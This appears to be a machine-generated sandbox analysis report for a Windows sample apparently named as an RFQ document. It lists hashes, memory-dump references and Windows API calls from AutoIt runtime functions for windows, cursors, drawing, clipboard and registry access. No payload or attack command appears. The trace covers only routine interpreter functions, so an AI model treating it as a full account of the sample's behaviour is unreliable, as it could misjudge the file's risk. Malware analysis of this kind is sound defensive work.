                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 4040870279-2373415609
                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                        Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                        • String ID:
                                                        • API String ID: 69173610-0
                                                        • Opcode ID: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                        • Opcode Fuzzy Hash: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                        Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                        Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-3360698832
                                                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                        Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load
                                                        • String ID:
                                                        • API String ID: 1675784387-0
                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                        Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1582027408-0
                                                        • Opcode ID: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                        • Opcode Fuzzy Hash: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                        Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseConnectCreateRegistry
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 3217815495-966354055
                                                        • Opcode ID: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                        • Opcode Fuzzy Hash: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                        Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                        • String ID: ($,$tooltips_class32
                                                        • API String ID: 225202481-3320066284
                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                        Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                        • String ID:
                                                        • API String ID: 15083398-0
                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                        Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                        • String ID: @$AutoIt v3 GUI
                                                        • API String ID: 867697134-3359773793
